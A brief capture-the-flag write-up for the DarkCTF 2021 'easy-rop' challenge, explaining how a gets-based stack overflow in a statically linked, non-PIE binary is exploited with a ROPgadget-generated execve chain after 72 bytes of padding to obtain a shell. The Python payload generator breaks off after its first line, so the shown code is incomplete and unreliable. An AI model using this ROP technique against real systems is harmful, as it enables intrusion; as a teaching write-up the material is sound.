Tags: ropchain bufferoverflow rop 


The executable provided prints out two strings, then reads a string with `gets` into a small local (on the stack) buffer. This exposes a well-known buffer overflow attack, where ROP can be used to execute arbitrary code (the goal currently being to get a shell).

The file is statically linked, and PIE is disabled, so any static ROPchain should work fine. One can be generated using `ROPgadget`:

ROPgadget --ropchain --binary easy-rop

which gives a huge payload (I guess it didn't find a good way to set `eax` to a higher value). Adjusting it via debugging (run with `gdb`, check what address ended up as the first return address), 72 bytes of padding are needed before the payload. The final payload generator is:

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

p += pack('

Original writeup (https://github.com/keyboard-monkeys/ctf-writeups/blob/main/2021-darkctf/pwn_easy_rop.md).